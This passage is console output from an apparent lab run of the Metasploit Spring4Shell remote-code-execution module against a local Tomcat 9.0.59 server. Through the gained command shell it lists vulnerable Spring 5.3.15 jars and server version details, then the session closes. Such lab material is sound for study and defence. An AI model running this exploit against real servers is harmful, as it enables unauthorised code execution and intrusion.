-rw-r----- 1 root root 1271872 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-context-5.3.15.jar
-rw-r----- 1 root root 1480617 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-core-5.3.15.jar
-rw-r----- 1 root root  288784 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-expression-5.3.15.jar
-rw-r----- 1 root root   24440 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-jcl-5.3.15.jar
-rw-r----- 1 root root 1638528 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-web-5.3.15.jar
-rw-r----- 1 root root 1028435 Apr  5 19:59 /usr/local/tomcat/webapps/helloworld/WEB-INF/lib/spring-webmvc-5.3.15.jar

java -cp /usr/local/tomcat/lib/catalina.jar org.apache.catalina.util.ServerInfo
Server version: Apache Tomcat/9.0.59
Server built:   Feb 21 2022 21:01:10 UTC
Server number:  9.0.59.0
OS Name:        Linux
OS Version:     5.10.60.1-microsoft-standard-WSL2
Architecture:   amd64
JVM Version:    11.0.14.1+1
JVM Vendor:     Oracle Corporation

exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf6 exploit(multi/http/spring4shell_rce) > 
```
